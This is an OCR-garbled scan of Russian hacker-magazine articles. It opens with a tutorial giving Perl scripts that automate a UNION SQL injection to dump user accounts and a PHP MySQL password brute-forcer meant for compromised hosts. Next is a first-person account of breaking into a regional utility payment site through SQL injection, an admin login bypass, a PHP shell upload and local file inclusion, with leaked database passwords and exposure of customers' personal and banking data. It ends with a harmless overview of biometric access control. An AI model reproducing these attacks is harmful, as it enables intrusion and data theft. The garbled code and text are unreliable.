запись изтаблицы. Знакомая ситуация? :) Что делать в та ком случае? Копи- 
пастить каждую учетку ручками — нереально, а найти админку и попробовать 
слить все акки оттуда — не всегда возможно. Крометого, иногда и в админках 
нас поджидает неприятный сюрприз: листе пользователями бывает разбитна 
несколько частей (например, по 20-40 записей), а всего таких частей несколько 
сотен. Тому, кто любит работать руками, флаг в эти самые руки. А мы лучше чуть- 
чуть напряжем извилины и найдем выход из сложившейся ситуации :). 
Опытные 5СН_-инжекторы только ухмыльнутся, ведь выход незамысловат 
— написать скрипт, дергающий нужный нам запрос и утягивающий записи 
из БД. Реализацией этой идеи мы и займемся. Длятого чтобы пример был 



более показательным, выберем простенький инъект, который послужит нам 
в образовательных целях. Пусть это будет, гм... вот: 

ЫсЬр: //ѵшѵ7.ѵ70г1сіЦорЫодз . сот/іпсіех.рЪр?саЬ_ісІ=-1%27 + 
ипіоп+зеІесЦ+сопсаб (изегпате , сЬаг ( 58 ) ,раззж)гс1) ,2 + бг 
ош+еѵобз_изег+1іті!:+0 , 1+/* 

Люблю я блоги, особенно бажные :]. Тем не менее перед нами типичная 
уязвимость. Мускул возвращает нам одну запись после каждого запроса, то 
есть в ответ на верхнюю кверю, мы получим: 

пеиЦгеаІ : 47ае1с118а1сіТТЪ9Ь027Ъа46а5282сі12 

По мереувеличения значений ІітіТа нам будут передаваться новыезаписи 
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(Іітіі 0, 1 , затем ІітіИ , 1 ит.д.). Наша задача — написать скриптик, который 
проделает рутину за нас :). Кодить будем на Регі’е, поскольку І_ѴѴР (ЫЬгагу 
ІогѴѴѴѴѴѴ (ог Регі) нам просто необходима. Много времени на это не потребу- 
ется, при соответствующих знаниях это дело пяти минут. Чтобы не пускаться 
в лирику, показываю свой готовый сорец (комментарии ниже): 



! 1 



{ 



# ! /ивг/Ъіп/регІ 

ргіпС "====== ЗОЬ-іпзесбіоп СгаЬЬег Ьу КОісі ======\п" ; 

изе ШР: :3ішр1е фѵ(деЪ) ; 
ореп(РЬ, ' >гези11: . СхС ' ) ; 

$2-0; 

бог ( $і=0; $і<=1000 ; $і++) { 
ореп ( СЫ , ' >соипб . бхС 1 ) ; 

$иг1= ' ІіССр: //ѵтѵтѵ^.ѵ/огІсіборЫодз . сош/іп(іех.р]ір?саС_ 
ій--1%27+ипіоп+зе1есС+сопсаС (изегпаше , сЬаг (58) ,раззѵ7 
огсі) , 2 + бгот+еѵоСз_изег+1іті1:+ ' . ( $і ) . ' , 50/* ' ; 
$сопС-де1: ($иг1) ; 
ргіпС Е $сопС . " \п" ; 

$2=$2+1; 
ргіпС СЫ $ 2 ; 
сіозе СЫ; 

} сіозе РЬ; 

ргіпС БОЫЕ ==============\п" ; 



Каквидишь, перемення $игІ содержит в себе линк на инъект, причем, $і 
принадлежит Іітіі’у и находится в цикле, что позволяет создавать все 
новые и новые запросы к базе. Параметры бог() следует изменять в каждом 
конкретном случае: 



бог ($і-0;$і<-1000;$і++) 



Первый аргумент — начальное значение (в нашем случае таблица начи- 
нается с нулевой записи), а второй — количество сливаемых акков (у нас 
1 к). В качестве результата сохраняется НТМІ_-страничка каждого запроса, 
полный лог пишется в гезиН.М, ну а в соипііхі: находится обычный счетчик 
(объем слитой инфы). 

На первый взгляд, все просто, но после слива мы получаем здоровенный 
файлик гезиіііхі со всяким мусором метров эдак на 1 50. Поэтому вторым 
этапом будет парсинг нужных нам данных из гезиІііхЕ Как водится, приво- 
жу полный сорец: 



# ! /изг/Ъіп/регІ 
ореп(ТТ, " /бтр/сіЪ. бхб " ) ; 
ѵ/ііііе ( $1іпе - <ТТ>) { 

$х-іпсіех($1іпе / "I"); 
$ 2 -гіпсІех ( $1іпе , " I" ) ; 
іб ( $х>— 1 && $ 2 >- 1 ) { 
$ 1 опд=$ 2 -$х; 
$гез-зиЬзбг ( $1іпе , 
ргіпб "$гез \п" ; 
$х=-1; 

$ 2 =- 1 ; 



($х+1), ( $1опд-1 ) ) ; 



} 



} 



сіозе ТТ; 



I 1 



Коротко поясню. Ты, наверное, обратил внимание на второй аргумент функ- 
ций іпсІехО и гіпсІехО — «|». Дело втом, что еще при сливе в запросе следует 
обрамлять получаемый нами результат символом «|». Делается это длятого, 
чтобы парсер смог вычленить аккаунтсреди прочего мусора и НТМІ_-тэгов. 
То есть в первый скрипт следует вставлять бажный линк вида: 



'! 



Ьббр : / /ѵгшг. ѵгогІйборЫодз . сот/ Іпс1ех.р1ір?са1:_іс1--1%27 + 
ипіоп+зеіесб+сопсаб (сЬаг ( 94 ) ,изегпате, сЬаг (58) ,раззѵ? 
огсі., сЬаг ( 94 ) ) , 2 + бгот+еѵобз_изег+1ітіб+0 , 1+/* 

Для тех, кто не помнит: сбаг(94) как раз и есть символ «|». Кстати, юзать ты 
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I I. 



X 



I І. 



можешь любой редко встречающийся символ, например « л » или «%». 
Таким образом, мы имеем полный комплект для слива добытых нами 
данных :). Причем сливать подобным образом можно все что угодно, вплоть 
до профилей мемберов форумов. Правда, доработать его не помешало бы, в 
частности сделать многопоточным, но это возлагается на тебя. 



В ПАРСИМ МѴ50І.-БАЗЫ 

С парсингом и сливом данных вроде разобрались, как говорится, было бы 
что сливать/парсить :). Так как к инъектам возвращаться нерезонно (подни- 
май подшивку ][), на этот раз мы пойдем другим путем. А именно напишем 
Му50І_-сканер с функциями брутфорсера. Идея проста, поэтому для ее реа- 
лизации потребуются лишь/сіеѵ/бапсіз и/беѵ/ЬеасІ :). Кодить в этом случае 
будем на РНР, нато есть две причины: во-первых, РНР, какправило, есть 
на большинстве хостингов, а во-вторых, для запуска РНР-скрипта нужно 
минимум прав. 

Теперь немного отом, что должна уметь делать софтинка (минимум): 

• осуществление коннекта к мускул-серверу; 

• непосредственно сам брут; 

• ведение полного лога сканирования. 

С веб-менюшкой я сильно заморачиваться не стал: 



<Ь.бш1хЬ.еа(і><б і б 1 е> 

РНР МуЗ<2Ь Зсаппег ѵ0 .1-Ъеба Ьу КОісІ (збгоікоѵ@ 
датеіапсі.ги) 

</біб1ех/Ьеа<і><Ъо<Эу> 

<богт епсбуре- "тиІбірагб/богт-Ьаба" асбіоп- "ртз .рЬр" 
тебЬоЬ- "розб">ир1оасІ бііе: 

сіприб пате- "гак" буре-" бііе" ></Ьгх/Ьг>РабЬ.: 

<іприб пате-"с1іг" буре-"бехб"х/Ьг> 

сіприб буре-"зиЬтіб " ѵаіие- "ІІр1оа(і /, х/богт> 

сбогт асбіоп-"ртз .рЬр" теббюсІ-"розб">Е-таі1 герогб: 

сіприб пате-"етаі1" буре-"бехб"> 

сіприб буре-"зиЬтіб " ѵа1ие-"5багб 8сап"х/богт> 

с /Ъосіух /Ь.бт1> 
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Как видишь, здесь пара формочек, в том числе и для аплоада файлов на 
сервер, ну и заветный батон с надписью «Зіагі 5сап». При желании ты 
можешь поместить веб-панельку и сам скрипт в разные файлы, скажем, 
в ѵѵеЬ.ЫтІ и зсаппег.рЬр, хотя большого смысла в этом нет. Теперь 
переходим к сорцу Му50І_-сканера (его ты можешь взять с 0Ѵ0). Скрипт 
достаточно простой, но пару моментов я все же поясню. Во-первых, от- 
ключаем лимит времени работы скрипта и подтверждаем игнорирование 
разрыва соединения с клиентом, далее юзаем файлики: ЬовІпатез.М 
— списоксканируемых хостов, Іодіпз.М — список логинов и раззѵѵогсіз. 
Іхі — словарик с пассами. Затем скрипт коннектится к выбранному из 
боз^патез.М серверу и пытается залогиниться с полученным из других 
двух файлов аккаунтом. Если соединение прошло успешно, сканер зано- 
сит рабочий акк в лог; если нет, сообщает в логе об ошибке соединения 
:). По окончании брута сценарий отправляетуведомление нам на мыло 
(если таковое было изначальноуказано при запуске сканера). Как и в слу- 
чае с парсером, недоработок хватает, поэтому РНР/РегІтебе в помощь. 

Не забывай только, что сканер должен отличаться безглючной работой. 
Юзать подобное произведение можно с обычных веб-шеллов на ломаных 
ресурсах в период пребывания админа сервера в запое :). Кстати, по 
собственному опыту скажу, что иногда встречаются и пустые рутовые 
аккаунты без пасса. 
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В ѴѴНАТ ЕІ_5Е? 

Какты понимаешь, совершенству нет предела. В статье я лишь коротко 
обозначил тебе суть идеи, а воспользоваться ей или нет — решать тебе. 

Как бы там ни было, ты всегда можешь доработать мои сорцы, улучшить их 
и, конечноже, поделиться со мной :). Крометого, в случае доработки очень 
рекомендую обратить внимание на проблему многопоточности. Согласись, 
что гораздо удобнее, а главное — быстрее, юзать сканер в 10-15 потоков с 
одного сервера. В общем, все зависит оттебя, а если будут вопросы — пиши 
на почту и жди ответа, ц-ц 
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КОММУНАЛЬНЫЙ 

олм 



РАЗВАЛ ЖКХ ПО-ХАКЕРСКИ 



Здравствуй, мой незнакомый друг! Хочу тебя спросить кое о чем. Ты исправно оплачива- 
ешь коммунальные услуги, которые нам любезно предоставляет государство? А веришь 
ли ты в то, что все твои данные — сколько, когда, зачем и чего ты израсходовал — на- 
ходятся в безопасности? Закрадываются сомнения? Я тоже засомневался после своего 
очередного взлома. Лете гоу! 



в серфинг 

Как-то раз, бродя по бескрайним просторам инета, я наткнулся на некий 
«Информационный портал Краснодарского края» — ЬНрѴ/киЬап.іпіо . 

Мой пронырливый взгляд не задержался бы на этой заурядной страничке 
надолго, если бы я не увидел баннер сайта неизвестной мне ранее пла- 
тежной системы цр, находившейся по адресу ЫЛрѴ/др.иаІв.ги . От нечего 
делать я решил его немного поизучать. Платежка была очень интересной. 
Здесь можно было оплачивать коммунальные услуги, штрафы ГИБДД, 
телефон, налоги и прочую ерунду. Оплата происходила несколькими спо- 
собами: по 5ГП5, через платежный терминал (у этой самой «КуПи» есть и 
такое чудо), банковским переводом или специальной картой предоплаты. 
Причем на самом сайте существовала система регистрации пользовате- 
лей, из чего я сделал вывод, что в базе данных платежки может находить- 
ся очень много интересной инфы :). Итак, не откладывая дело в долгий 
ящик, я принялся за взлом. 

г НАЧАЛО поисков 

Сначала, как обычно, я залез на незабвенный сІотаіпвсІЬ.пеІ и выяснил там, 
что киЬап.іпіо и идіз.ги находятся на одном серваке :). Первым делом моим 
жестоким экспериментам подвергся идіз.ги . После недолгого вбивания 
кавычекво всевозможные параметры первая ЗОБ-инъекция была найдена. 
На запрос «бирз://ид1:5.ги/іпЬ/5егѵісе/іррЬопе/?сагсІ_і:уре=1 29007’» Опера 
сказала мне, что на взламываемой машине стоит Роз^дгеЗцІ: 

Магпіпд: рд_диегу ( ) : (Хіегу Раііесі: ЕНКОК: ипРегтіпаРес! 
диоРесЗ зРгіпд аР ог пеаг «'» ар сЬагасРег 183 іп /ѵаг/ 
тісІдагсі/ргераг5ег/идР5/6-1638-92 .ркр оп Ііпе 523 
Магпіпд: рд_пшп_гоу73 ( ) : зиррііесі агдитепР із пор а ѵаіісі 
РозРдгеЗОЬ гезиІР гезоигее іп /ѵаг/тісідагсі/ргерагзег/ 
идРз/6-1638-92 .рЪр оп Ііпе 524 



007+ипіоп+зеІесР+І , ТАВЬЕ_ЫАМЕ , 3 , 4 + Ргот+ШЕОКМАТІОЫ_ 
8СНЕМА . ТАВЬЕЗ 1 -- 

Но мне это быстро надоело, так как данные в ІМР0НМАТІ0[\]_5СНЕМАбыли 
неисчерпаемы, а я выудил только некоторые названия таблиц: 



ЬгапсЬ._дгоир 

ЬгапсЬ._гедиезР 

саііз 

сатега_1оск 

сагб._спр 

сагб._руре_спр 

сагр 

сЪапде_1од 

сЬапде_1од_(ЗеРаі1з 

сЬеск_сопзРгаіпР_гоиРіпе_изаде 

сРіеск_сопзРгаіпРз 

с о 1 итп_с1ота і п_и заде 

со1ишп_ргіѵі1едез 

с о 1ишп_иб.Р_и з ад е 

соіитпз 



После небольшого молодецкого секса с предыдущей инъекцией я стал 
копаться в другом баге, заинтересовавшем меня по понятным причинам 
словом сагб :). 



кРРрз : //идРз . ги/іпРо/зегѵісе/ірр1іопе/?сагсІ_Руре=129 
007+ипіоп+зеІесР+І ,СОШШ_ЫАМЕ, 3 , 4 + Ргош+ШРОКМАТІОЫ 
_ЗСНЕМА . СОЫІМЫЗ+Ѵ7Ііеге+ТАВЬЕ_ЫАМЕ= ' сагй_Руре_спР ' апй 
СОШШ_ЫАМЕ> 1 іа. ' — 



Эта информация меня, конечно же, обрадовала, я даже стал мучиться с Таким образом я выудил названия полей таблички: 



запросамитипа: 


сагсі Руре 


кРРрз : / /идРз . ги/іпРо/зегѵісе/ірр]іопе/?сагсІ_Руре=12 9 




іа 



► 070 
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>> 



Іоскесі 

Іодіп 

раззѵгогсі 

рауесМэу 

зоІсЩо 



Но в самой таблице абсолютно ничего не было :(. 

В ПРО ДУРШЛАГ 

Обнаружив эти вопиющие дыры, я из спортивного интереса решил найти 
такую инъекцию, с которой не надо было бы долго мучиться и которая 
выводила бы в цикле сразу всю информацию. И вскоре такая дырка была 
найдена! 



ЪрДр : //киЬап . іпбо/дашез/шрЗ /?Д=1+ипіоп+зе1ес1:+1 , ТАВЬЕ. 
ЫАМЕ , До_сЬ.аг (3,222) . /еДс/ 

козДз ' ,333, ' 444 ' +бгош+ШЕОВМАТІОЫ_ЗСНЕМА.ТАВЬЕ5-- 
&р=195 



Вместо трЗ'шек выводятся таблички :). 

А дальше я вообще удивился. Мало того, что столь серьезный проект 
дыряв, как мои старые носки, 5С11_-инъекции встречаются на каждом шагу 
(и еще одна: ЬйрУ/Ііѵе.киЬап.іп^оЛ.такя еще иудачно попал на время 
проведения каких-то работ на серваке, в результате чего просто пройдя по 
ссылке иаіз.ги . можно было лицезреть следующее: 



//$др_соппзЬг="сЗЬпаше=киЫпбо_асЗсЗз изег=идДз Ьозб^Ьазе 
раз зѵ70ГсЗ=_1бдпДІ Суки" ; 

$др_соппзДг="с1Ъпате=др изег=идДз 1юзР=1 . 1 . 1 . 3 
раззѵгогсі^ІІдпСІСуСи" ; 

$др_сопп=рд_соппес1: ( $др_соппзДг) ; 

//$соппзбг= м (1Ъпате=заЬ_кигог1: изег=за1:_кигог1: 
Ьозб^Ьазе раззѵгогсІ=ер5^і5Еі " ; 

$соппзРг="(1Ьпате=ид1:з изег=заД_кигогС ЬозЬ=1 . 1 . 1 . 3 
раззж)гс1=ер5^і5Еі " ; 

$согт=рд_соппесД ($соппзЬг) ; 
іб ( ! $сопп) 

кеасЗег ( "ЬосаДіоп: /еггог/?со<Іе=1 м ) ; 



Ну это ли не чудо? Логин и пароль от базы данных платежки в открытом 
виде! Они должны были пригодиться мне в дальнейшем, а пока нужно было 
любыми способами получить шелл... 

В В ПОИСКАХ ШЕЛЛА 

Немного погуглив на тему паблик-скриптов на сервере платежки, я нашел 
два рбрЬЬ-форума: 



ЬДДр : / /шоЬіІе . киЪап . іпбо 

кЬСр: //зЬіскегз .киЬап. іпбо/шоЬі1е/р1ірВВ2 



Но, как это ни грустно, они были абсолютно непробиваемые (подели- 
тесь кто-нибудь приватным сплоитом под 2.0.22 :)). Но уже ничто не 
могло меня остановить! После еще нескольких часов поиска я заметил 
неадекватную реакцию скрипта одного из поддоменов нашего сервера 
на запрос: 



ЬДДр : //сІериСак . киЬап . іпбо/ ?Ь 
/ебс/раззѵгсі 



Но запрос ничего полезного не дал. Не отчаявшись, я впихнул в конец 
ссылки пи 11-байт (%00). Теперь локальный инклуд в запасе у меня был. 
Оставалось лишьзагрузить куда-нибудь рИр-шелл... Вотза этим заня- 
тием я и провел оставшийся вечер и утро. Я внимательно изучал каждый 



поддомен... И вот на одном из них я увидел админку для добавления 
новостей на сайт: 



кДСр: //зг .киЬап. іпбо/абшіп 



Сразу же по старой привычке я ввел в поля с паролем и логином следую- 
щие значения: 



1 ' ог 1=1/* 



И оказался внутри админки :). Найти форму загрузки фотки к новости не 
с о ста в ил о труда. Только вместо фотографии, конечно же, был загружен 
РНР-файл с моим РНР-шеллом, который ты можешь найти на диске, при- 
лагавшемся к сентябрьскому номеружурнала. Из-за временных глюков в 
админке новостей я быстро вычислил путь для моей псе в до картинки: 



/ѵаг/ѵтѵш/киЪіп:бо/8г/пеѵ78Ітд/447 . ^рд 



Затем просто взял и заинклудил ее в найденный ранее уязвимый скрипт: 



кССр: //(ЗериДаД .киЬап. іп!о/?Ь= . 
ѵаг/ѵ7ѵ^7/киЫпбо/зг/пе^зітд/447 . ^рд%00 



И получилась очень эротичная страничка. 

га БАЗЫ! КАК МНОГО В ЭТОМ ЗВУКЕ... 

Я немного поизучал сервер и очень расстроился, когда увидел, что на нем 
находятся только два сайта —те самые пресловутые Ыір://сІериіаі. киЬап. 
іпЬ и ЬНрУ/зг.киЬап.іпТ) . Но они должны были иметь доступ к РозІдгеБОБ- 
серверу основного сайта платежки 1 .1 .1 .3. Тем более что в одном из конфи- 
гов сайта депутатов было следующее: 



$БВ_Н08Т = 


1 1 . 1 . 1 . 3 ' ; 


$БВ_08ЕК = 


' киЫпбо ' ; 


$БВ_РАЗЗ = 


' , Іге , ііуЪспв ' ; 


$БВ_НАМЕ = 


' (5ериба1:_кі ' ; 



Для проверки надо было всего лишь найти скрипт, который может управлять 
базами та кого типа. Им оказалась рЬрРдАбтіп с сайта рбррдасітіп.огд . 
Успешно слив его ѵѵдеТом и распаковав, я сразуже полез в базу данных 
через ЬНр://5г.киЬап.іп(о/пе\л/5Іта/рбрРаАс1тіп-4.1 .1/ [скорее всего, 
когда ты будешь читать эту статью, скрипт там так и будет стоять :)). Передо 
мной стали медленно открываться таблицы платежки. Зайдя, к примеру, 
в орегаіог, я увидел зареганных на портале предпринимателей — фирма 
«МИГО», «Седин-Снаб», «ЮгКабель», «ПАМИР-К» и другие со всеми дан- 
ными, логинами и паролями. Со своих аккаунтов они продавали на сайте 
различную продукцию и устраивали аукционы. В другихтаблицах были 
логи по проданным картам предоплаты, отправленные зтз, с помощью 
которых юзеры оплачиваютуслуги сайта, полная инфа по банковским 
счетам: реквизиты, кто, кому, за что и когда платил :). 

Но и это еще не все! В базе я обнаружил несколько таблиц, в которых 
были прописаны Ф.И.О., адрес и телефон тех людей, которые оплачивали 
коммунальные услуги, газ, свет, телефон через терминалы «КуПи»! Но 
разглашать эту информацию я не имею права :). Та к что на этом пора закан- 
чивать. Но подредактированный скриншотя все же предоставлю тебе как 
информацию к размышлению. 

0 ЭПИЛОГ 

Закрыв от греха подальше браузер, я задумался. Если никто не заботится 
о нашей стобой конфиденциальной информации, если даже крупная 
платежная система подвержена взлому, то кто должен думать обо мне, о 
тебе, кроме нас самих? Ни один из описанных багов не закрыт до сих пор 
вотуже на протяжении четырех месяцев. Я могу дать тебе только один 
совет: построй себе домик где-нибудь в лесу и живи там один в обнимку 
с ноутбуком, пока остальные люди будут находиться под колпаком у Боль- 
шого Брата :). т 
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Здравствуй, дорогой друг! Сегодня мы немного поговорим о биометрии. Для этого пред- 
положим, что ты, попивая пивко на любимой проселочной дорожке, решил посетить 
святая святых — в народе биотуалет. Подходя поближе, ты замечаешь, что старая знако- 
мая бабка-контролер, расположившись неподалеку с подносом семечек, ностальгически 
посматривает на входную дверь туалета, в которую люди теперь могут входить совер- 
шенно беспрепятственно. В голове проносится шальная мысль о возможном изменении 
статуса уборной и ее переименовании в бесплатный туалет типа Макдоналдс, но нет! На 
заветной двери — табличка: «Пятку прислонять сюда», а рядом — замысловатое отверс- 
тие, куда каждый возжелавший должен прислонить часть себя. Итак, век биометричес- 
ких технологий наступил... 



Н НЕМНОГО О ТЕХНОЛОГИЯХ КОНТРОЛЯ ДОСТУПА 

Какты понял еще, наверное, в раннем детстве, в нашем суровом мире 
все хорошее и нужное почему-то закрыто от всеобщего обозрения и поль- 
зования. В общем-то, доступ в большинство заветных мест легко можно 
получить с помощью банальных денежных знаков, но, во-первых, это не 
всегда так (за какие такие средства тебя подпустили бы, скажем, кядер- 
ному сараю Пентагона?], а во-вторых, нас стобой сейчас не интересует 
получение доступа куда-то там путем нехилыхухищрений. Нам главное, 



что вообще принципиально существуют места, куда доступ нужно закры- 
вать, ограничивать. 

Итак, в современном мире вовсю, так сказать, стоит задача ограничения 
доступа. В литературе штуки, которые призваны справляться с подобной 
задачей, называются системами контроля доступа, или сокращенно СКД 
(реже употребляется СКУД, где добавлено слово «управление»]. 

Итак, какже можно контролировать доступ к какому-либо важному 
объекту, другими словами, какие бывают СКД? Вообще говоря, человека 
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пропускают на желаемый объекттогда, когда у него есть то, 
что требуют от него решающие, пропускать его или нет (ну 
предположим, абонементна посещение вышеобозначен- 
ной уборной). Поэтому, в зависимости оттого, что именно у 
него должно быть, принято различать несколько типов С КД: 
парольные, атрибутные, биометрические и, естественно, 
комбинированные. 

Парольная система требует от пользователя, чтоб у него 
был пароль. Ну, например, кактеперь модно делать во все 
тех же туалетах крупных сетей быстрого питания: на чеке 
— код (читай: пароль) и, чтобы попасть куда надо или очень 
надо, опять-таки надо ввести этот код-пароль. Нормальному 
человекуломать тутособо нечего — пароль можно друг другу 
передать, что делается во все тех же забегаловках с установ- 
ленным кодом на доступ в «Мэ» и «Жо». Если же ты хакер, то 
спросить код доступа у соседа или, что еще хуже, получить 
его легально — просто несолидно. Все настоящие хакеры 
пароли ломают! 

Атрибутная система для допуска к вожделенному объекту 
требует наличия какой-нибудь финтифлюшки: раньше 
это была банальная корочка-пропуск, ну а в наши дни это 
обычно карточка типа кредитки, хотя это и необязатель- 
но — атрибут, в общем-то, может быть любым. Атрибуты 
бывают контактными (такие обычно показывают в крутых 
фильмах, когда главный герой, проходя в подземный бункер 
ЦРУ, эффектно проводитсвоей персональной карточкой в 
известной щели) и бесконтактными. Контактные атрибуты 
наиболее распространены в виде магнитных пластиковых 
карт (к банковским разновидностям которых многие из нас 
так стремятся). Возьмем хотя бы телефонные карты со встро- 
енным чипом — чем не контактный атрибут? Из контактных 
можно еще упомянуть: 

• карточки со штрихкодами (в общем-то, легко клонируются 
путем нанесения идентичного штрихкода и затем похожего 
прозрачного защитного покрытия на более-менее подходя- 
щую по цвету и плотности поверхность); 

• карты, сделанные из пластика, прозрачного для инфра- 
красных лучей, с нанесенной на внутренних слоях невиди- 
мой при дневном свете информацией; при просвечивании 
ИК-лучами считыватель получает код карточки и решает, 
можно ли пропускать ее владельца (эти карты подделыва- 
ются сложнее, так как для этого надо иметь подходящий 
пластик, то есть как минимум разворотить такую же карточку, 
да еще нанести на внутренние слои подходящей краской 
нужную инфу). 

• карточки «Виганд» с хаотически впечатанными нарезан- 
ными проволочками, каждая из которых даетуникальный 
отклик считывателю (подделать та кую карту практически не- 



возможно: для этого проволочки надо разложить в точности 
так, как в оригинальной карте, а погрешность размещения 
хотя бы одной проволочки даже на миллиметр уже даст 
другой «портрет», и подделка не прокатит). 

Что же касается бесконтактных карточек, то они, конечно, 
удобнее (не надо ничего доставать из карманов — обмен 
идет по радиоканалу) и надежнее, но при этом значительно 
дороже, поэтому не очень распространены. В качестве при- 
мера таких карт можно назвать карты Ргохітііу. Тут подделка 
также маловероятна, так как чип, встроенный в карту, и 
считыватель общаются по защищенному криптографичес- 
кому протоколу. 

В целом атрибуты, какты понимаешь, намного надежнее 
паролей — ведь их нельзя так просто размножить. Однако 
и поменять атрибутлегальному пользователю сложнее, 
нежели пароль. А если разобраться, то кто мешает передать 
атрибут стороннему субъекту? Какже ограничить доступ, 
подпуская к защищаемому объекту только избранных? 

^ БИОМЕТРИЯ — КЛЮЧ КСПАСЕНИЮ 

Вот мы и подошли ктеме статьи. Итак, классно было бы 
проверять право доступа по самому человеку, при «вхо- 
де» контролировать какие-то его личные характеристики 
(биометрические характеристики, то есть те, по которым 
можно измерить свойства живого субъекта). Некоторые 
характеристики у всех людей более-менее похожи (напри- 
мер, количество пальцев на левой ноге). Другие, наоборот, 
практически уникальны. Так, в криминалистике уже давно 
успешно применяется система опознавания личности по 
рисунку папиллярных линий на его пальцах (проще говоря, 
по отпечаткам пальцев). Вероятность совпадения рисунка у 
двух разных людей составляет не более одной миллионной 
(иногда называются еще меньшие цифры). 

В наш век суперкомпьютерных технологий появилась 
возможность контролировать все, что ты хочешь (а не только 
«пальчики»), то есть выбирать. А выбирать надо такие систе- 
мы, которые не очень напрягают пользователя (то есть чело- 
века, который авторизуется). К примеру, психологически не 
очень комфортно каждый раз при приходе на работу «сда- 
вать» отпечатки пальцев. Еще хуже куда-то прислонять глаз 
(вот лично у меня почему-то все время возникает мысль, что 
оттуда что-то вылезет и как стукнет прям по глазу!). Короче 
удобство — это первое, а второе (в действительности самое 
главное) — надежность распознавания пользователя (о 
показателях надежности читай во врезке). 

Для рассмотрения конкретных биометрических систем 
надо сказать пару слов об их классификации. Наиболее 
распространено разделение на аппаратные и программные 




> СІѴСІ 

На дискеты найдешь 
две программы, 
реализующие 
биометрическую 
проверку по нажа- 
тым клавишам. Одна 
из них моя :). 




> Ііпкз 

\лл/ѵ\л/.асІііесІ~).со.ик 

— продукты распоз- 
навания по лицу; 
ѵѵѵѵѵѵТіпдегІес.сот 

— распознавание по 
отпечаткам пальцев; 
ѵѵѵѵѵѵ.йпдегргіпі- 
іЕсот — много всего 
полезного по био- 
метрии: от готовых 
продуктов до описа- 
ния технологий; 
Ыоте1пстъ[ — до- 
статочно интерес- 
ный сайт просто «о 
биометрии»; 
Ьіоііпк.ги — сайт 
крупного российс- 
кого производителя 
биометрических 
продуктов. 



Пару слов о надежности 
биометрических систем 



Все подобные системы характеризу- 
ются тремя показателями : 

1) РАК (Раке АссерГапсе КаГе) — час- 
тота ложных приемов. Например, 
если из 100 проб входа в систему 
злоумышленником (который, ясен 
перец, там не зарегистрирован) 
может произойти одна случайная 



идентификация его с законным 
пользователем, то РАК= 0,01, что, в 
общем-то, многовато для статиче- 
ских (физиологических) систем 
и нормально для динамических 
(поведенческих) . 

2) РКК (Раке Ке)есгіопКаГе) — часто- 
та ложных отказов. Например, если 



на 100 аутентификаций, выпол- 
ненных законным пользователем, 
произошло два неправомерных 
отказа, то РКК= 0,02. 

3) ЕЕК, или ЕКК (Ециаі Еггог КаГе, 
или ЕКгог КаГе), — частота ошибок. 
Это сложное понятие, которое 
формируется в связи с тем, что 



биометрическую систему обычно 
можно настраивать, варьировать 
ее параметры. Так вот РАК и РКК 
связаны между собой, и когда один 
показатель уменьшается, второй 
обязательно увеличивается. Если 
при каких-то настройках РАК = РКК, 
то это и есть значение ЕКК. 
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'стройство трехмерного распознавания лица (работает на 
іасстоянии до 2 метров в инфракрасном диапазоне) 




системы, а также на статические и динамические. С первым разделе- 
нием, в общем-то, все понятно, а вот второй способ надо рассмотреть 
подробнее. 

Статические системы еще называютфизиологическими (это даже более 
распространенное название), а динамические системы — поведенче- 
скими. Первые проверяют какие-нибудь характеристики тела человека 
(отсюда название «физиологические»), которые не изменяются втечение 
достаточно длительных периодов его жизни (следовательно, «статиче- 
ские»). Это, например, те же самые отпечатки пальцев. Что же касается 
динамических (поведенческих) систем, то тут контролю подлежит не тело 
человека, а его привычки, поведение. Способ, особенности выполнения и 
конечный результат каких-либо заданных действий. Это, например, также 



Немного о 
терминологии 



Надеюсь, ты часто слышишь 
слова «идентификация», «аутен- 
тификация» и прочая «ция». Я сам 
лично постоянно путаю их друг с 
другом и употребляю невпопад. 
Поэтому разберемся. 
Авторизация (разрешение) 

— процесс (процедура) полу- 
чения доступа к какому-либо 
закрытому (охраняемому) 
объекту; может проводиться 
разными способами; в ней можно 
выделить три нижеследующих 
составляющих. 

Идентификация (распознавание) 

— процесс выбора одного поль- 
зователя из всей совокупности 
пользователей, зарегистриро- 
ванных в системе; она позволяет 
ответить на вопрос: «Кто это?» 
Можно сказать, что идентифика- 



ция это процесс поиска соответ- 
ствия «один из многих». 
Аутентификация (отожде- 
ствление) — это процедура 
доказательства, что пользова- 
тель действительно является 
зарегистрированным поль- 
зователем системы (именно 
тем, которым он назвался 
или был опознан в процессе 
идентификации). Другими 
словами, это установление 
подлинности утверждения 
«один к одному». 

Верификация (проверка, 
подтверждение) — термин, 
который часто используется как 
синоним аутентификации. А 
вообще русские эквиваленты в 
скобочках приведены, так что сам 
разбирайся... 



распространенный в быту способ верификации документов подписью. 

Итак, пришло время рассмотреть некоторые конкретные биометрические 
системы. 

г ФИЗИОЛОГИЧЕСКИЕ БИОМЕТРИЧЕСКИЕ СИСТЕМЫ 

Этот класс систем наиболее надежен и обычно реализуется аппаратно (и 
поэтому это дорого). Рассмотрим некоторые примеры. 



Бонус 



На диске ты найдешь исходник 
простейшей программулины, 
которую я написал специально 
для этой статьи. При желании 
с помощью нее ты сможешь 
изучать особенности биометри- 
ческих систем. Единственным 
контролируемым параметром 
является время удержания каж- 
дой отдельно взятой клавиши. 

У программы есть два режима 
работы. В режиме «Обучение» 
она думает, что с ней работает 
законный пользователь, и 
считает среднее время удержа- 
ния клавиш, которые записыва- 
ются в файл есііаіоп.сіаі. Потом 
программу можно запустить в 
режиме «Контроль», и по набору 
того же самого (или другого) 
текста программа будет отсле- 
живать время удержания клавиш 
текущего пользователя. Когда 
пользователь наберет достаточ- 
ное количество букв (определя- 
ется константой ИитБутЪ), про- 
изойдет сравнение имеющихся 
значений среднего времени с 



эталонным. Конечно, при этом 
даже у законного пользовате- 
ля возникнет определенная 
погрешность (помним, что это 
все-таки поведенческая систе- 
ма, которой принципиально 
присущи погрешности) . Так вот 
результат сравнения (кстати, 
он высчитывается с помощью 
меры Евклида) сравнивается с 
так называемой стандартной 
непохожестью, определяемой 
константой МахИероК (кстати, 
Иерой возникло от слова «непо- 
хожесть», а не от того, о чем ты 
подумал) . Таким образом, систе- 
му можно настраивать: сделаешь 
больше МипЗутЪ — работа ста- 
нет точнее, но авторизация будет 
происходить дольше; сделаешь 
меньше МахЛерой — умень- 
шится РАК, но и возрастет РКК. 
Короче говоря, настройки, как 
обычно, в твоих руках. Ах да, за- 
был сказать: исходный текст моей 
программы можешь использо- 
вать, кактебе заблагорассудится, 
я тебе его дарю! 
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Комбинированный замок, считывающий втом числе отпечатки пальцев 



